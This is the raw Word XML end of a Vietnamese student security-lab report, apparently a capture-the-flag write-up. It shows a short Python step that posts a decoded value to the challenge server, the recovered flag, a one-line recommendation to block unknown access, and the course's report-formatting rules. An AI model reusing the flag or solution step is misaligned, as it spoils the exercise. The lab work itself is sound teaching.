    <w:p w14:paraId="0B74096E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D9A8298" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>generate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> request 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9105EB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>r2</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>={</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="CE9178"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'Q'</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dec</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759CD638" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD317FC" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="6A9955"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694BD8EA" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:line="325" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="DCDCAA"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>r2</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="9CDCFE"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="D4D4D4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCD75F5" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E32EF86" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Thực thi đoạn code và ta có được kết quả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331BD85F" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="114300" distB="114300" distL="114300" distR="114300" wp14:anchorId="76E7C434" wp14:editId="345EFAF9">
            <wp:extent cx="6114105" cy="3441700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="3441700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E48958B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>flag{s0n1c_isnt_that_fast_after_all}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519DD7F3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Khuyến cáo: chặn các truy cập không rõ nguồn gốc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F72790B" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="559A66D3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F677F9A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6096ED57" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191C1DDD" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66B27968" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67E8679E" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59DBF442" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66367C57" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>Sinh viên đọc kỹ yêu cầu trình bày bên dưới trang này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534CF2D1" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="C00000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>YÊU CẦU CHUNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0C1444" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="bookmark=id.2et92p0" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="47" w:name="bookmark=id.3znysh7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="46"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sinh viên tìm hiểu và thực hành theo hướng dẫn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C725476" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nộp báo cáo kết quả chi tiết những việc (</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Report</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>) bạn đã thực hiện, quan sát thấy và kèm ảnh chụp màn hình kết quả (nếu có); giải thích cho quan sát (nếu có).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591F11F3" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sinh viên báo cáo kết quả thực hiện và nộp bài.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18008460" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Báo cáo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E31C55" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">File </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>PDF</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Tập trung vào nội dung, không mô tả lý thuyết.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C2D155" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Nội dung trình bày bằng</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Font chữ Times New Romans/ hoặc font chữ của mẫu báo cáo này (UTM Neo Sans Intel/UTM Viet Sach)– cỡ chữ 13</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Canh đều (Justify) cho văn bản. Canh giữa (Center) cho ảnh chụp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E5654D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đặt tên theo định dạng: [Mã lớp]-SessionX_GroupY. (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
